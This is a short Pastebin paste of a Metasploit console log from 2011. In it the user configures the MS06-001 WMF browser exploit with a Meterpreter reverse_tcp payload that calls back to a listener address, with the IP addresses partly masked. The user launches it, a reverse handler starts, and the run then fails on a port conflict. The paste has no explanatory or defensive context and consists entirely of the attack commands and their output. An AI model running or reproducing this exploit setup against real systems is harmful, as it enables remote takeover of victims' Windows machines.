Advertisement
dehqan

Untitled

May 5th, 2011
419
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.71 KB | None | 0 0
  1. =[ metasploit v3.6.0-release [core:3.6 api:1.0]
  2. + -- --=[ 648 exploits - 340 auxiliary
  3. + -- --=[ 216 payloads - 27 encoders - 8 nops
  4.  
  5. msf exploit(ms06_001_wmf_setabortproc) > use exploit/windows/browser/ms06_001_wmf_setabortproc
  6. msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/meterpreter/reverse_tcp
  7. PAYLOAD => windows/meterpreter/reverse_tcp
  8. msf exploit(ms06_001_wmf_setabortproc) > set LHOST 79.***
  9. LHOST => 79.***
  10. msf exploit(ms06_001_wmf_setabortproc) > set SRVHOST 85.***
  11. SRVHOST => 85.***
  12. msf exploit(ms06_001_wmf_setabortproc) > exploit
  13. [*] Exploit running as background job.
  14. [*] Started reverse handler on 79.***:4444
  15. [-] Exploit exception: The address is already in use (85.***:8080).
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement